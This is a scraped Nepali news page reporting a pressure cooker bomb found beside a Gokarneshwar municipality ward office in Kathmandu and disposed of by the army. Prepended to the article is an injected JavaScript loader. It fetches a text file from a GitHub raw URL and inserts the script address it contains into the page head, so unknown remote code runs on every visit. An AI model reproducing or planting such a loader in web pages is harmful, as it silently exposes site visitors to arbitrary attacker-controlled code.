;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौ । काठमाडौकाे गोकर्णेश्वर नगरपालिका वडा नं ४ कार्यालयको छेवैमा (आज) बिहीबार बिहान प्रेसर कुकर बम भेटिएको छ । बम नेपाली सेनाकाे टाेलीले डिस्पोज गरेकाे छ । बम किन र कसले गर्याे भन्ने खुलेको छैन । घटनाको बारेमाा अनुसन्धान जारी छ ।
फेसबुक प्रतिक्रियाहरु